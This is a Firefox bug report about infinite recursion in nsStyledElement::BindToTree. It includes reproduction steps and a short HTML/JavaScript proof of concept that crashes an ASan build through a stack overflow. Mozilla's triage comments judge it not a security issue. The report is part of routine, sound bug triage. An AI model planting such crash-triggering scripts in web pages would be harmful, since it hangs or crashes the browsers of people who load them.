Open Bug 1809375 Opened 2 years ago Updated 4 months ago

Infinite recursion in nsStyledElement::BindToTree

Categories

(Core :: DOM: Core & HTML, defect)

defect

Tracking

()

People

(Reporter: eternalsakuraalpha, Unassigned)

Details

(Keywords: reporter-external, Whiteboard: [reporter-external] [client-bounty-form] [verif?])

Attachments

(1 file)

Attached file asan.log

===============
FIREFOX VERSION:

author	Ben Hearsum <bhearsum@mozilla.com>
Mon, 09 Jan 2023 18:01:10 +0000 (10 hours ago)
changeset 648462	329b80a0d03371363bd785a9a26cbda7433dd20a
parent 648461	702085eca7a199d7b5ef1c44006b621b85dcccb6
push id	40538
push user	mlaza@mozilla.com
push date	Mon, 09 Jan 2023 21:21:01 +0000 (7 hours ago)
treeherder	mozilla-central@329b80a0d033 [default view] [failures only]
perfherder	[talos] [build metrics] [platform microbench] (compared to previous push)
reviewers	mkaply
bugs	1807926
milestone	110.0a1

===============
OS: Linux

===============
STEPS TO REPRODUCE:

  1. run
    fuzzfetch -a -n firefox-asan or fuzzfetch --build 329b80a0d03371363bd785a9a26cbda7433dd20a --asan
    to download latest firefox.
  2. simply run firefox poc.html to trigger AddressSanitizer abort.

POC

<html>
<script>
function func() {
  var tr = document.createElement("tr");
  try {
      var child = func();
      tr.appendChild(child);
  } catch (e) {}

  return tr;
}
func()
</script>
</html>

===============
AddressSanitizer Log

See attachment below.

Flags: sec-bounty?
Attachment #9311502 - Attachment mime type: text/x-log → text/plain
Group: firefox-core-security → dom-core-security
Component: Security → DOM: Core & HTML
Product: Firefox → Core

This isn't a security issue. The test case just causes some kind of infinite recursion. In a regular browser build, it just kind of sits there, using up 100% CPU. Maybe in an ASan build it runs out of stack faster because the stack frames are bigger.

Status: UNCONFIRMED → NEW
Ever confirmed: true
Summary: Trigger AddressSanitizer stack-overflow on firefox → Infinite recursion in nsStyledElement::BindToTree
Group: dom-core-security

The severity field is not set for this bug.
:hsivonen, could you have a look please?

For more information, please visit auto_nag documentation.

Flags: needinfo?(hsivonen)

I only saw a couple of crashes in the last week on crash-stats that even had nsStyledElement::BindToTree in the proto stack, so I don't think this is a common issue for users.

Severity: -- → S3
Flags: needinfo?(hsivonen)
Flags: sec-bounty? → sec-bounty-
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Created:
Updated:
Size: